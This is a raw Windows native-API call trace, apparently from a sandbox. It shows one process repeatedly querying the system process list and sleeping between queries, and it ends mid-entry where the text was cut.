[0143.787] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0143.787] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0143.788] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0143.789] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0143.792] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0143.793] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0143.801] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0143.801] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0143.802] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0143.802] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0143.802] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0143.804] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0143.805] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0143.817] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0143.817] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0143.817] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0143.818] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0143.818] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0143.820] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0143.820] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0143.832] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0143.833] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0143.833] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0143.833] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0143.833] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0143.836] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0143.836] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0143.848] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0143.848] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0143.848] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0143.849] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0143.849] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0143.851] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0143.852] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0143.864] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0143.864] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0143.864] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0143.864] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0143.865] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0143.866] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0143.867] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0143.879] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0143.879] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0143.880] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0143.880] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0143.880] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0143.882] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0143.883] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0143.907] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0143.907] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0143.908] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0143.908] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0143.908] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0143.910] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0143.910] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0143.926] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0143.926] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0143.927] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0143.927] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0143.927] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0143.929] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0143.930] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0143.941] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0143.942] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0143.942] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0143.943] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0143.943] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0143.946] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0143.947] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0143.957] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0143.957] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0143.958] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0143.958] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0143.958] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0143.960] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0143.960] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0143.973] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0143.973] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0143.974] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0143.974] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0143.974] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0143.977] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0143.978] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0143.991] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0143.991] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0143.992] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0143.992] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0143.992] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0143.995] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0143.996] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0144.005] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0144.005] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0144.006] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0144.006] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0144.006] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0144.009] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0144.010] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0144.019] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0144.020] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0144.020] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0144.021] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0144.021] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0144.023] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0144.023] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0144.040] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0144.040] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0144.040] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0144.041] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0144.041] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0144.043] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0144.043] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0144.053] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0144.053] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0144.053] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0144.054] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0144.054] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0144.056] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0144.056] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0144.066] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0144.066] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0144.067] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0144.067] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0144.067] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0144.069] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0144.070] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0144.082] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0144.082] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0144.083] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0144.083] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0144.083] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0144.085] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0144.086] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0144.113] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0144.114] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0144.114] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0144.114] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0144.115] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0144.116] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0144.117] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0144.129] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0144.129] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0144.129] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0144.130] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0144.130] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0144.132] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0144.132] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0144.152] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0144.153] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0144.153] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0144.154] 